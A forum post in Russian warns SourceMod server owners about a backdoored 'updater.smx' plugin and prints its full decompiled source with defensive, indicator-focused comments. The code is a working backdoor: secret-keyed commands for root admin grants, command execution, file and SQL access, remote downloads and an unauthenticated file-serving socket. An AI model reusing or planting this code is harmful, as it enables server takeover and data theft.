Nekro
Сегодня ко мне обратился человек по поводу «нашествия хулиганов»: мол, они имеют рут-доступ админа. Был проведён анализ, и установлено, что на сервере завёлся бэкдор. Бэкдор был установлен 6 дней назад, и «хулиганы», видимо, выжидали это время, чтобы вредоносный файл не определили сразу. В нём не указан автор, и называется он updater.smx — так что, ребята, обращаем внимание. Компиляция плагина была произведена за 59 минут до установки его на сервер. Сам человек затруднился ответить, откуда взялся этот файл, с учётом того, что доступ 3 лиц был ограничен.
Также прилагаю декомпилированный код плагина (обычный декомпилятор не смог его декомпилировать — видимо, была установлена защита).
Так что, ребята, будьте ВНИМАТЕЛЬНЕЕ: не качайте мусор из групп ВК (сливы плагинов)!!!
Так же прилагаю декомпилировнный код плагина. (обычный декомпилятор не смог его декомпилировать, видимо была установлена защита)
Так что ребята будьте ВНИМАТЕЛЬНЕЕ, не качайте мусор с групп вк (сливы плагинов) ! ! !
C-подобный:
// Compiler-emitted plugin version record. `filevers` is the SourceMod version
// the plugin was built against; `date`/`time` are the build stamp embedded by
// the compiler. The stamp comes from the clock of the machine that compiled
// the file, so treat it as a triage hint rather than proof of a timeline.
public PlVers:__version =
{
version = 5,
filevers = "1.10.0.6490",
date = "03/13/2022",
time = "12:10:58"
};
new Float:NULL_VECTOR[3];
new String:NULL_STRING[16];
public Extension:__ext_core =
{
name = "Core",
file = "core",
autoload = 0,
required = 0,
};
new MaxClients;
// Hard dependency on the Socket extension (required = 1, autoload = 1).
// For triage: a plugin named like an updater that requires socket.ext and has
// no author/info record is worth decompiling before it is trusted.
public Extension:__ext_socket =
{
name = "Socket",
file = "socket.ext",
autoload = 1,
required = 1,
};
// Port and handle of the listening socket opened inside GetRootCommand.
new g_iPortFTP;
new Handle:g_hSocketFTP;
// File handle shared between commands 2 and 3 of OnChildSocketReceive.
new Handle:currentFile;
// Saved DataPack positions written by Download_Socket and read back by the
// OnUSocket* callbacks and CloseSocketHandles.
new DataPackPos:DLPack_Header;
new DataPackPos:DLPack_File;
new DataPackPos:DLPack_Request;
// Fetches a remote resource over plain HTTP and writes it to `dest` under the
// "GAME" path id. Opens the destination for binary write, builds an HTTP/1.0
// GET request for `path` on `hostname:port`, stores the per-download state
// (header-parsed flag, file handle, request text) in a DataPack attached to
// the socket, then starts the connection. Returns 0 on every path.
// The visible code performs no integrity or origin check on what is written,
// so during incident response any file under the game directory modified in
// the exposure window should be treated as untrusted.
Download_Socket(String:hostname[], port, String:path[], String:dest[])
{
new Handle:hFile = OpenFile(dest[0], "wb", false, "GAME");
if (hFile)
{
decl String:sRequest[1536];
FormatEx(sRequest, 384, "GET /%s HTTP/1.0\r\nHost: %s:%i\r\nConnection: close\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n", path[0], hostname[0], port);
new Handle:hDLPack = CreateDataPack();
// Position of the "header already parsed" flag, initialised to 0.
DLPack_Header = GetPackPosition(hDLPack);
WritePackCell(hDLPack, 0);
// Position of the destination file handle.
DLPack_File = GetPackPosition(hDLPack);
WritePackCell(hDLPack, hFile);
// Position of the request string sent once the socket connects.
DLPack_Request = GetPackPosition(hDLPack);
WritePackString(hDLPack, sRequest);
// 1 is SOCKET_TCP in the Socket extension. The bare integers 31, 27, 33 and
// 29 are decompiler function indices for the callbacks - presumably the
// OnUSocket* handlers in this file; confirm against the binary.
new Handle:socket = SocketCreate(1, 31);
SocketSetArg(socket, hDLPack);
SocketSetOption(socket, 1, 4096);
SocketConnect(socket, 27, 33, 29, hostname[0], port);
return 0;
}
return 0;
}
// Releases the resources of one download: the destination file handle stored
// in the DataPack at DLPack_File, the DataPack itself, and the socket.
CloseSocketHandles(Handle:socket, Handle:hDLPack)
{
SetPackPosition(hDLPack, DLPack_File);
CloseHandle(ReadPackCell(hDLPack));
CloseHandle(hDLPack);
CloseHandle(socket);
return 0;
}
// Returns the index of character `c` in `str`, scanning from the end when
// `reverse` is true and from the start otherwise; returns -1 when not found.
// The `str[0][i]` indexing is decompiler notation for `str[i]`.
FindCharInString(String:str[], String:c, bool:reverse)
{
new len = strlen(str[0]);
if (reverse)
{
new i = len + -1;
while (0 <= i)
{
if (c == str[0][i])
{
return i;
}
i--;
}
}
else
{
new i;
while (i < len)
{
if (c == str[0][i])
{
return i;
}
i++;
}
}
return -1;
}
// Writes a single value of `size` bytes to the file by wrapping it in a
// one-element array and passing it to WriteFile; returns WriteFile's result.
bool:WriteFileCell(Handle:hndl, data, size)
{
new array[1];
array[0] = data;
return WriteFile(hndl, array, 1, size);
}
// Command-listener callback that forwards a client's argument string to the
// server command buffer. The only gate is a client info key ("g6m30g1h6j")
// compared against a hard-coded value; no SourceMod admin check appears.
// Return values follow the Action enum: 4 is Plugin_Stop, 0 is Plugin_Continue.
// Both literals below are fixed indicators for this sample. They show up in
// decompiled output; a compiled .smx may be compressed, so match them after
// decompression or decompilation rather than on the raw file.
public Action:BDSrvCmd(client, String:command[], argc)
{
new String:info[128];
if (GetClientInfo(client, "g6m30g1h6j", info, 32))
{
// strcmp is non-zero on mismatch: wrong value stops the command.
if (strcmp(info, "4nwb860bu4fg638", true))
{
return 4;
}
// Match: the whole argument string is queued as a server command.
new String:szCmd[16384];
GetCmdArgString(szCmd, 4096);
InsertServerCommand(szCmd);
return 0;
}
return 4;
}
// Copies file `from` to `to` (both resolved under the "GAME" path id) in
// 4096-byte binary chunks, overwriting the destination. Returns 0 always.
// As printed, CloseHandle is called on `copytarget` and `file` even when the
// corresponding OpenFile failed; this may be a decompiler artifact.
public CopyBinFile(String:from[], String:to[])
{
new Handle:file = OpenFile(from[0], "rb", false, "GAME");
if (file)
{
new Handle:copytarget = OpenFile(to[0], "wb", false, "GAME");
if (copytarget)
{
new buffer[4096];
new read;
while ((read = ReadFile(file, buffer, 4096, 1)))
{
WriteFile(copytarget, buffer, read, 1);
}
}
CloseHandle(copytarget);
}
CloseHandle(file);
return 0;
}
// Command-listener callback that dispatches on argument 1. The decompiler has
// rendered an if/else-if chain as nested `if (strcmp(...))` blocks: strcmp is
// non-zero on mismatch, so each nesting level means "not this literal", and
// the handler for a literal is the code that follows the closing brace of its
// block. When nothing matches the function returns 0 (Plugin_Continue); every
// handler returns 3 (Plugin_Handled), so the command never reaches the game.
// No admin or identity check on `client` is visible in this function; the
// literals themselves are the only gate. Capabilities present, for scoping an
// incident: in-memory admin grant/removal, server command execution with
// captured output, file copy/delete/mkdir/chmod, directory listing, file read,
// HTTP download to disk, a listening TCP socket, and arbitrary SQL against any
// configured database. The literals are fixed indicators for this sample.
public Action:GetRootCommand(client, String:command[], argc)
{
new String:szType[128];
GetCmdArg(1, szType, 32);
if (strcmp(szType, "v23904cn90234", true))
{
if (strcmp(szType, "xf51nr56s1r5", true))
{
if (strcmp(szType, "29m3c40n923v4", true))
{
if (strcmp(szType, "hdt68gn40htg", true))
{
if (strcmp(szType, "ae680h4d6gb", true))
{
if (strcmp(szType, "vr54hvsr5ch1", true))
{
if (strcmp(szType, "t684v1rssh89", true))
{
if (strcmp(szType, "54fhgm10hg5", true))
{
if (strcmp(szType, "2v34mcm9023v94", true))
{
if (strcmp(szType, "fd531n45fgn", true))
{
if (strcmp(szType, "v23venc2039mr", true))
{
if (strcmp(szType, "xf35gn1f6fg", true))
{
// No literal matched: let the command continue normally.
return 0;
}
// Handler for "xf35gn1f6fg": SQL access. Argument 2 is passed to SQL_Connect
// as the database configuration name, argument 3 is executed as a query, and
// up to 43 result rows are printed to the caller's console. Every database
// the server has configured should be treated as exposed (contents and, if
// writable, integrity).
new String:sDB[256];
new String:sQuery[16384];
new String:sError[512];
GetCmdArg(2, sDB, 64);
GetCmdArg(3, sQuery, 4096);
new Handle:hDB = SQL_Connect(sDB, false, sError, 128);
if (hDB)
{
if (sError[0])
{
PrintToConsole(client, sError);
}
else
{
new Handle:hResult = SQL_Query(hDB, sQuery, -1);
if (hResult)
{
if (SQL_HasResultSet(hResult))
{
// bTables tracks whether the column-name header row was already printed.
new bool:bTables;
new i = 1;
while (SQL_MoreRows(hResult))
{
if (i < 44)
{
if (SQL_FetchRow(hResult))
{
new String:sBuffer[8192];
new iCount = SQL_GetFieldCount(hResult);
if (!bTables)
{
FormatEx(sBuffer, 2048, "№", i);
new j;
while (j < iCount)
{
new String:sName[256];
SQL_FieldNumToName(hResult, j, sName, 64);
Format(sBuffer, 2048, "%s | %s", sBuffer, sName);
j++;
}
PrintToConsole(client, "%s |", sBuffer);
bTables = true;
}
FormatEx(sBuffer, 2048, "%i.", i);
new j;
while (j < iCount)
{
if (SQL_IsFieldNull(hResult, j))
{
Format(sBuffer, 2048, "%s | NULL", sBuffer);
}
else
{
new String:sResult[1984];
SQL_FetchString(hResult, j, sResult, 496, 0);
Format(sBuffer, 2048, "%s | %s", sBuffer, sResult);
}
j++;
}
PrintToConsole(client, "%s |", sBuffer);
}
else
{
PrintToConsole(client, "Invalid SQL_FetchRow");
}
i++;
}
// NOTE(review): as printed this message runs on every loop pass; the
// decompiler has most likely lost a break/else around the row limit.
PrintToConsole(client, "Query rows > 43");
}
}
else
{
PrintToConsole(client, "Invalid SQL_HasResultSet");
}
}
else
{
// SQL_Query returned no handle: retry the same text as a prepared statement.
PrintToConsole(client, "Invalid result handle, execute");
hResult = SQL_PrepareQuery(hDB, sQuery, sError, 128);
if (sError[0])
{
PrintToConsole(client, sError);
}
if (SQL_Execute(hResult))
{
PrintToConsole(client, "Success");
}
}
CloseHandle(hResult);
}
}
else
{
PrintToConsole(client, "Invalid handle");
}
CloseHandle(hDB);
return 3;
}
// Handler for "v23venc2039mr": file read. Prints the lines of the file named
// by argument 2 (under the "GAME" path id) to the caller's console, skipping
// the first N lines where N is argument 3. Configuration files holding
// passwords or database credentials are readable this way, so rotate them.
new String:szPath[2048];
GetCmdArg(2, szPath, 512);
if (FileExists(szPath, false, "GAME"))
{
new Handle:hFile = OpenFile(szPath, "rb", false, "GAME");
if (hFile)
{
new String:szOffset[48];
GetCmdArg(3, szOffset, 12);
new iOffset = StringToInt(szOffset, 10);
new String:szLine[8192];
new idx = 1;
while (ReadFileLine(hFile, szLine, 2048))
{
if (idx > iOffset)
{
PrintToConsole(client, "%i. \"%s\"", idx, szLine);
}
idx++;
}
CloseHandle(hFile);
return 3;
}
PrintToConsole(client, "Failed to open");
return 3;
}
PrintToConsole(client, "Not found");
return 3;
}
// Handler for "fd531n45fgn": directory listing. Prints each entry of the
// directory named by argument 2 together with its size in bytes.
new String:szPath[2048];
GetCmdArg(2, szPath, 512);
if (DirExists(szPath, false, "GAME"))
{
new Handle:hDir = OpenDirectory(szPath, false, "GAME");
if (hDir)
{
new String:szObject[4096];
new String:szFullPath[6144];
new i = 1;
while (ReadDirEntry(hDir, szObject, 1024, 0))
{
Format(szFullPath, 1536, "%s/%s", szPath, szObject);
i++;
PrintToConsole(client, "%i. \"%s\"\x09%i bytes", i, szObject, FileSize(szFullPath, false, "GAME"));
}
CloseHandle(hDir);
return 3;
}
PrintToConsole(client, "Failed to open dir");
return 3;
}
PrintToConsole(client, "Dir not found");
return 3;
}
// Handler for "2v34mcm9023v94": remote download. Arguments 2-5 are host, port,
// remote path and local destination, passed to Download_Socket, which writes
// the response body to disk. New or replaced plugins and extensions dated
// inside the exposure window are the artefacts to look for.
new String:szHostname[2048];
GetCmdArg(2, szHostname, 512);
new String:szPort[32];
GetCmdArg(3, szPort, 6);
new iPort = StringToInt(szPort, 10);
new var5;
if (iPort < 1 || iPort > 65565)
{
PrintToConsole(client, "\x01");
return 3;
}
new String:szDlPath[2048];
GetCmdArg(4, szDlPath, 512);
new String:szPath[2048];
GetCmdArg(5, szPath, 512);
Download_Socket(szHostname, iPort, szDlPath, szPath);
return 3;
}
// Handler for "54fhgm10hg5": listening socket. With a port in argument 2 it
// (re)creates a TCP socket bound to 0.0.0.0 on that port and listens on it.
// An unexpected listener owned by the game server process is a host-level
// indicator; compare open ports against the expected game/RCON set.
if (argc > 1)
{
new String:sPortFTP[32];
GetCmdArg(2, sPortFTP, 6);
new iPortFTP = StringToInt(sPortFTP, 10);
new var4;
if (iPortFTP > 0 && iPortFTP < 65536)
{
g_iPortFTP = iPortFTP;
if (g_hSocketFTP)
{
CloseHandle(g_hSocketFTP);
}
// 23 and 25 are decompiler function indices for the error and incoming
// callbacks - presumably OnSocketError / OnSocketIncoming; confirm.
g_hSocketFTP = SocketCreate(1, 23);
SocketBind(g_hSocketFTP, "0.0.0.0", g_iPortFTP);
SocketListen(g_hSocketFTP, 25);
}
// NOTE(review): as printed the range-error text is shown even after a valid
// port; the decompiler has probably dropped an else/return here.
PrintToConsole(client, "iPortFTP < 1 || iPortFTP > 65535");
return 3;
}
// Without a port argument a number is printed; the literal 2316 looks like a
// raw data address left by the decompiler (presumably g_iPortFTP) - confirm.
PrintToConsole(client, "%i", 2316);
return 3;
}
// Handler for "t684v1rssh89": changes the permission bits of the path in
// argument 2 to the integer mode given in argument 3.
new String:szPath[512];
GetCmdArg(2, szPath, 128);
new String:buffer[128];
GetCmdArg(3, buffer, 32);
new mode = StringToInt(buffer, 10);
if (!(SetFilePermissions(szPath, mode)))
{
PrintToConsole(client, "error");
}
return 3;
}
// Handler for "vr54hvsr5ch1": creates the directory in argument 2 with the
// mode given in argument 3.
new String:szPath[512];
GetCmdArg(2, szPath, 128);
new String:buffer[128];
GetCmdArg(3, buffer, 32);
new mode = StringToInt(buffer, 10);
if (!(CreateDirectory(szPath, mode, false, "DEFAULT_WRITE_PATH")))
{
PrintToConsole(client, "error");
}
return 3;
}
// Handler for "ae680h4d6gb": deletes the directory or file in argument 2.
// Missing logs or plugin files may therefore be part of the same intrusion.
new String:szPath[512];
GetCmdArg(2, szPath, 128);
new var1;
if ((DirExists(szPath, false, "GAME") && RemoveDir(szPath)) || (FileExists(szPath, false, "GAME") && DeleteFile(szPath, false, "DEFAULT_WRITE_PATH")))
{
return 3;
}
PrintToConsole(client, "error");
return 3;
}
// Handler for "hdt68gn40htg": copies the file in argument 2 to the path in
// argument 3 through CopyBinFile.
new String:szFrom[512];
GetCmdArg(2, szFrom, 128);
new String:szTo[512];
GetCmdArg(3, szTo, 128);
CopyBinFile(szFrom, szTo);
return 3;
}
// Handler for "29m3c40n923v4": runs the rest of the argument string as a
// server command via ServerCommandEx and prints the captured output back to
// the caller's console. The offset skips the literal and one separator.
new String:szCommand[8192];
new String:sBuffer[32768];
GetCmdArgString(szCommand, 2048);
ServerCommandEx(sBuffer, 8192, szCommand[strlen("29m3c40n923v4") + 1]);
PrintToConsole(client, sBuffer);
return 3;
}
// Handler for "xf51nr56s1r5": removes the admin entry currently bound to the
// calling client.
RemoveAdmin(GetUserAdmin(client));
return 3;
}
// Handler for "v23904cn90234": creates an unnamed admin entry, sets flag 14
// (Admin_Root in SourceMod's AdminFlag enum) and binds it to the calling
// client. No file write appears here, so the grant would not show up in the
// on-disk admin lists; this matches the "root access" symptom in the report.
new AdminId:admClient = CreateAdmin("");
SetAdminFlag(admClient, 14, true);
SetUserAdmin(client, admClient, true);
return 3;
}
// Disconnect callback for an accepted (child) socket: closes its handle.
public OnChildSocketDisconnected(Handle:socket, any:arg)
{
CloseHandle(socket);
return 0;
}
// Error callback for an accepted (child) socket: closes its handle and
// reports nothing, so failures on this channel leave no trace in server logs.
public OnChildSocketError(Handle:socket, errorType, errorNum, any:arg)
{
CloseHandle(socket);
return 0;
}
// Receive callback for connections accepted on the plugin's listening socket.
// The first byte of each message selects an action: 1 sends back a directory
// listing, 2 opens a file for reading and remembers it in `currentFile`,
// 3 sends the next chunk (up to 2048 bytes) of that file. Paths are resolved
// under the "GAME" path id.
// No credential check is visible in this handler, so while the listener is
// open, file contents are exposed to any host able to reach the port. Review
// firewall/flow logs for inbound connections to unexpected ports on the game
// host when scoping what may have been read.
// Several string literals below contain U+FFFD characters: the original bytes
// were lost in decompilation/extraction and cannot be recovered from here.
public OnChildSocketReceive(Handle:socket, String:receiveData[], dataSize, any:arg)
{
new cmd = receiveData[0];
switch (cmd)
{
case 1:
{
// Drop the command byte so receiveData starts at the requested path.
new pathLen = memshift(receiveData[0], dataSize, 1);
if (pathLen < 1)
{
SocketSend(socket, "\x0E���InvaliRequest", -1);
return 0;
}
if (DirExists(receiveData[0], false, "GAME"))
{
new Handle:dir = OpenDirectory(receiveData[0], false, "GAME");
if (dir)
{
new String:buffer[256];
new String:entry[2048];
new FileType:type;
// Each entry is sent as: 4-byte length, 1-byte file type, name bytes.
while (ReadDirEntry(dir, entry, 512, type))
{
new entryLen = strlen(entry);
WriteLong(buffer, entryLen, 0);
SocketSend(socket, buffer, 4);
buffer[0] = type;
SocketSend(socket, buffer, 1);
SocketSend(socket, entry, entryLen);
}
SocketSend(socket, "�", 1);
CloseHandle(dir);
}
// NOTE(review): as printed the failure text is sent after a successful
// listing as well; the decompiler has probably lost a return here.
SocketSend(socket, "\x0E���FailedToOpenDir", -1);
return 0;
}
SocketSend(socket, "\x0E���DirNotFound", -1);
return 0;
}
case 2:
{
new pathLen = memshift(receiveData[0], dataSize, 1);
if (pathLen < 1)
{
SocketSend(socket, "\x0EInvaliRequest", -1);
return 0;
}
new Handle:file = OpenFile(receiveData[0], "rb", false, "GAME");
if (file)
{
// One global handle: a later open replaces it without closing the earlier
// one, as far as this listing shows.
currentFile = file;
}
// NOTE(review): sent on success too as printed - likely a lost return.
SocketSend(socket, "\x0EFailedToOpenFile", -1);
return 0;
}
case 3:
{
new String:buffer[8448];
if (currentFile)
{
new Handle:file = currentFile;
new tmpBuf[2112];
new readed = ReadFile(file, tmpBuf, 2048, 1);
if (readed < 1)
{
// End of file or read error: send length -1 and release the handle.
currentFile = 0;
WriteLong(buffer, -1, 0);
SocketSend(socket, buffer, 4);
CloseHandle(file);
return 0;
}
// Chunk framing: 4-byte length written by WriteLong, then the data bytes.
WriteLong(buffer, readed, 0);
new i = 4;
while (readed + 4 > i)
{
buffer[i] = tmpBuf[i + -4];
i++;
}
SocketSend(socket, buffer, readed + 4);
}
WriteLong(buffer, -1, 0);
SocketSend(socket, buffer, 4);
return 0;
}
default:
{
}
}
return 0;
}
// Plugin entry point: registers two command listeners under random-looking
// command names. The first argument of each call is a decompiler function
// index, not a name; the targets are presumably GetRootCommand and BDSrvCmd,
// but which index maps to which cannot be told from this listing.
// The two command names are fixed indicators for this sample and are the
// strings to look for in decompiled plugins and in captured client commands.
public void:OnPluginStart()
{
AddCommandListener(13, "r2cn340923");
AddCommandListener(9, "65f0g1bf5r");
return 0;
}
// Error callback that only closes the socket handle; nothing is logged.
public OnSocketError(Handle:socket, errorType, errorNum, any:arg)
{
CloseHandle(socket);
return 0;
}
// Accept callback for the listening socket: sets socket options on the new
// connection and on the listener, then registers receive, disconnect and
// error callbacks for the new connection. The integers 19, 15 and 17 are
// decompiler function indices - presumably the OnChildSocket* handlers.
// `remoteIP` and `remotePort` are not used or recorded, so the plugin itself
// keeps no trace of who connected; rely on network-level logs for that.
public OnSocketIncoming(Handle:socket, Handle:newSocket, String:remoteIP[], remotePort, any:arg)
{
// Option ids 1, 9 and 10 are shown as raw numbers; their meaning is not
// established by this listing.
SocketSetOption(newSocket, 1, 2560);
SocketSetOption(newSocket, 9, 2560);
SocketSetOption(newSocket, 10, 2560);
SocketSetOption(socket, 9, 2560);
SocketSetOption(socket, 10, 2560);
SocketSetReceiveCallback(newSocket, 19);
SocketSetDisconnectCallback(newSocket, 15);
SocketSetErrorCallback(newSocket, 17);
return 0;
}
// Connect callback for a download socket: reads the prepared HTTP request
// string back from the DataPack and sends it to the remote host.
public OnUSocketConnected(Handle:socket, any:hDLPack)
{
decl String:sRequest[1536];
SetPackPosition(hDLPack, DLPack_Request);
ReadPackString(hDLPack, sRequest, 384);
SocketSend(socket, sRequest, -1);
return 0;
}
// Disconnect callback for a download socket: the transfer is over, so the
// file, DataPack and socket are released through CloseSocketHandles.
public OnUSocketDisconnected(Handle:socket, any:hDLPack)
{
CloseSocketHandles(socket, hDLPack);
return 0;
}
// Error callback for a download socket: releases the same resources as a
// normal disconnect. A partially written destination file is left on disk.
public OnUSocketError(Handle:socket, errorType, errorNum, any:hDLPack)
{
CloseSocketHandles(socket, hDLPack);
return 0;
}
// Receive callback for a download socket. On the first chunk it locates the
// end of the HTTP header, aborts the download unless the status code starts
// with "200", and records in the DataPack that the header has been handled.
// The remaining bytes of every chunk are written to the destination file.
// Nothing about the payload is verified before it reaches disk.
public OnUSocketReceive(Handle:socket, String:data[], size, any:hDLPack)
{
new idx;
SetPackPosition(hDLPack, DLPack_Header);
new bool:bParsedHeader = ReadPackCell(hDLPack);
if (!bParsedHeader)
{
// Body starts 4 bytes after the blank line; 0 if no blank line was found.
if ((idx = StrContains(data[0], "\r\n\r\n", true)) == -1)
{
idx = 0;
}
else
{
idx += 4;
}
if (!(strncmp(data[0], "HTTP/", 5, true)))
{
decl String:sStatusCode[256];
// The character literal is printed as a raw line break - presumably '\r',
// i.e. the end of the status line; the copy starts at offset 9, after
// "HTTP/x.y ".
strcopy(sStatusCode, FindCharInString(data[0], '
', false) + -8, data[0] + 9);
if (strncmp(sStatusCode, "200", 3, true))
{
CloseSocketHandles(socket, hDLPack);
return 0;
}
}
SetPackPosition(hDLPack, DLPack_Header);
WritePackCell(hDLPack, 1);
}
SetPackPosition(hDLPack, DLPack_File);
new Handle:hFile = ReadPackCell(hDLPack);
// NOTE(review): as printed, idx is incremented before the write; this is
// probably the decompiler's rendering of `data[idx++]` - confirm.
while (idx < size)
{
idx++;
WriteFileCell(hFile, data[0][idx], 1);
}
return 0;
}
// Stores `value` as four bytes in `buffer` starting at `start`, lowest byte
// first. Used to frame lengths in the socket protocol of OnChildSocketReceive.
// NOTE(review): the decompiler has dropped parentheses. As printed, `>>>`
// binds tighter than `&`; the intended form is presumably
// `(value & mask) >>> shift` for bytes 1-3.
public WriteLong(String:buffer[], value, start)
{
buffer[0][start + 0] = value & 255;
buffer[0][start + 1] = value & 65280 >>> 8;
buffer[0][start + 2] = value & 16711680 >>> 16;
buffer[0][start + 3] = value & -16777216 >>> 24;
return 0;
}
// Include-generated boilerplate: marks a fixed list of bit-buffer and protobuf
// natives as optional and then calls VerifyCoreVersion. It contains only
// MarkNativeAsOptional calls and no sample-specific logic, so it can be
// skipped during analysis and is of no use as an indicator.
public void:__ext_core_SetNTVOptional()
{
MarkNativeAsOptional("GetFeatureStatus");
MarkNativeAsOptional("RequireFeature");
MarkNativeAsOptional("AddCommandListener");
MarkNativeAsOptional("RemoveCommandListener");
MarkNativeAsOptional("BfWriteBool");
MarkNativeAsOptional("BfWriteByte");
MarkNativeAsOptional("BfWriteChar");
MarkNativeAsOptional("BfWriteShort");
MarkNativeAsOptional("BfWriteWord");
MarkNativeAsOptional("BfWriteNum");
MarkNativeAsOptional("BfWriteFloat");
MarkNativeAsOptional("BfWriteString");
MarkNativeAsOptional("BfWriteEntity");
MarkNativeAsOptional("BfWriteAngle");
MarkNativeAsOptional("BfWriteCoord");
MarkNativeAsOptional("BfWriteVecCoord");
MarkNativeAsOptional("BfWriteVecNormal");
MarkNativeAsOptional("BfWriteAngles");
MarkNativeAsOptional("BfReadBool");
MarkNativeAsOptional("BfReadByte");
MarkNativeAsOptional("BfReadChar");
MarkNativeAsOptional("BfReadShort");
MarkNativeAsOptional("BfReadWord");
MarkNativeAsOptional("BfReadNum");
MarkNativeAsOptional("BfReadFloat");
MarkNativeAsOptional("BfReadString");
MarkNativeAsOptional("BfReadEntity");
MarkNativeAsOptional("BfReadAngle");
MarkNativeAsOptional("BfReadCoord");
MarkNativeAsOptional("BfReadVecCoord");
MarkNativeAsOptional("BfReadVecNormal");
MarkNativeAsOptional("BfReadAngles");
MarkNativeAsOptional("BfGetNumBytesLeft");
MarkNativeAsOptional("BfWrite.WriteBool");
MarkNativeAsOptional("BfWrite.WriteByte");
MarkNativeAsOptional("BfWrite.WriteChar");
MarkNativeAsOptional("BfWrite.WriteShort");
MarkNativeAsOptional("BfWrite.WriteWord");
MarkNativeAsOptional("BfWrite.WriteNum");
MarkNativeAsOptional("BfWrite.WriteFloat");
MarkNativeAsOptional("BfWrite.WriteString");
MarkNativeAsOptional("BfWrite.WriteEntity");
MarkNativeAsOptional("BfWrite.WriteAngle");
MarkNativeAsOptional("BfWrite.WriteCoord");
MarkNativeAsOptional("BfWrite.WriteVecCoord");
MarkNativeAsOptional("BfWrite.WriteVecNormal");
MarkNativeAsOptional("BfWrite.WriteAngles");
MarkNativeAsOptional("BfRead.ReadBool");
MarkNativeAsOptional("BfRead.ReadByte");
MarkNativeAsOptional("BfRead.ReadChar");
MarkNativeAsOptional("BfRead.ReadShort");
MarkNativeAsOptional("BfRead.ReadWord");
MarkNativeAsOptional("BfRead.ReadNum");
MarkNativeAsOptional("BfRead.ReadFloat");
MarkNativeAsOptional("BfRead.ReadString");
MarkNativeAsOptional("BfRead.ReadEntity");
MarkNativeAsOptional("BfRead.ReadAngle");
MarkNativeAsOptional("BfRead.ReadCoord");
MarkNativeAsOptional("BfRead.ReadVecCoord");
MarkNativeAsOptional("BfRead.ReadVecNormal");
MarkNativeAsOptional("BfRead.ReadAngles");
MarkNativeAsOptional("BfRead.BytesLeft.get");
MarkNativeAsOptional("PbReadInt");
MarkNativeAsOptional("PbReadFloat");
MarkNativeAsOptional("PbReadBool");
MarkNativeAsOptional("PbReadString");
MarkNativeAsOptional("PbReadColor");
MarkNativeAsOptional("PbReadAngle");
MarkNativeAsOptional("PbReadVector");
MarkNativeAsOptional("PbReadVector2D");
MarkNativeAsOptional("PbGetRepeatedFieldCount");
MarkNativeAsOptional("PbSetInt");
MarkNativeAsOptional("PbSetFloat");
MarkNativeAsOptional("PbSetBool");
MarkNativeAsOptional("PbSetString");
MarkNativeAsOptional("PbSetColor");
MarkNativeAsOptional("PbSetAngle");
MarkNativeAsOptional("PbSetVector");
MarkNativeAsOptional("PbSetVector2D");
MarkNativeAsOptional("PbAddInt");
MarkNativeAsOptional("PbAddFloat");
MarkNativeAsOptional("PbAddBool");
MarkNativeAsOptional("PbAddString");
MarkNativeAsOptional("PbAddColor");
MarkNativeAsOptional("PbAddAngle");
MarkNativeAsOptional("PbAddVector");
MarkNativeAsOptional("PbAddVector2D");
MarkNativeAsOptional("PbRemoveRepeatedFieldValue");
MarkNativeAsOptional("PbReadMessage");
MarkNativeAsOptional("PbReadRepeatedMessage");
MarkNativeAsOptional("PbAddMessage");
MarkNativeAsOptional("Protobuf.ReadInt");
MarkNativeAsOptional("Protobuf.ReadInt64");
MarkNativeAsOptional("Protobuf.ReadFloat");
MarkNativeAsOptional("Protobuf.ReadBool");
MarkNativeAsOptional("Protobuf.ReadString");
MarkNativeAsOptional("Protobuf.ReadColor");
MarkNativeAsOptional("Protobuf.ReadAngle");
MarkNativeAsOptional("Protobuf.ReadVector");
MarkNativeAsOptional("Protobuf.ReadVector2D");
MarkNativeAsOptional("Protobuf.GetRepeatedFieldCount");
MarkNativeAsOptional("Protobuf.SetInt");
MarkNativeAsOptional("Protobuf.SetInt64");
MarkNativeAsOptional("Protobuf.SetFloat");
MarkNativeAsOptional("Protobuf.SetBool");
MarkNativeAsOptional("Protobuf.SetString");
MarkNativeAsOptional("Protobuf.SetColor");
MarkNativeAsOptional("Protobuf.SetAngle");
MarkNativeAsOptional("Protobuf.SetVector");
MarkNativeAsOptional("Protobuf.SetVector2D");
MarkNativeAsOptional("Protobuf.AddInt");
MarkNativeAsOptional("Protobuf.AddInt64");
MarkNativeAsOptional("Protobuf.AddFloat");
MarkNativeAsOptional("Protobuf.AddBool");
MarkNativeAsOptional("Protobuf.AddString");
MarkNativeAsOptional("Protobuf.AddColor");
MarkNativeAsOptional("Protobuf.AddAngle");
MarkNativeAsOptional("Protobuf.AddVector");
MarkNativeAsOptional("Protobuf.AddVector2D");
MarkNativeAsOptional("Protobuf.RemoveRepeatedFieldValue");
MarkNativeAsOptional("Protobuf.ReadMessage");
MarkNativeAsOptional("Protobuf.ReadRepeatedMessage");
MarkNativeAsOptional("Protobuf.AddMessage");
VerifyCoreVersion();
return 0;
}
// Shifts the contents of `src` left by `offset` positions in place and
// returns `len - offset`. OnChildSocketReceive uses it to strip the leading
// command byte from a received message.
// NOTE(review): the loop runs to `len`, so the last `offset` iterations read
// `src[offset + i]` at indices >= len - beyond the received data as far as
// this listing shows.
public memshift(String:src[], len, offset)
{
new i;
while (i < len)
{
src[0][i] = src[0][offset + i];
i++;
}
return len - offset;
}